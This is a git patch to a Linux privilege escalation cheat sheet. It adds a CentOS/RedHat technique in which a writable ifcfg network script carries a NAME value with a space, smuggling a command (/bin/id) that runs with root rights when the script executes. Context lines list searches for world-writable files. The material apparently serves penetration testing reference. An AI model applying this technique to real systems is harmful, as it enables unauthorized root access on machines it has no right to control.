From 32b83da30226291b5c6b9e87d48fd46f6d875c22 Mon Sep 17 00:00:00 2001
From: joker2a <nicoaunay@gmail.com>
Date: Mon, 4 May 2020 11:44:24 +0200
Subject: [PATCH] Update Linux - Privilege Escalation.md

Add new privesc for (Centos/Redhat)
Writable /etc/sysconfig/network-scripts/
---
 .../Linux - Privilege Escalation.md               | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index ae1705c..db7a558 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -497,6 +497,21 @@ find / -perm -2 -type f 2>/dev/null
 find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
 ```
 
+### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
+
+/etc/sysconfig/network-scripts/ifcfg-1337 for example
+
+```powershell
+NAME=Network /bin/id  &lt;= Note the blank space
+ONBOOT=yes
+DEVICE=eth0
+
+EXEC :
+./etc/sysconfig/network-scripts/ifcfg-1337
+```
+src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f]
+(https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
+
 ### Writable /etc/passwd
 
 First generate a password with one of the following commands.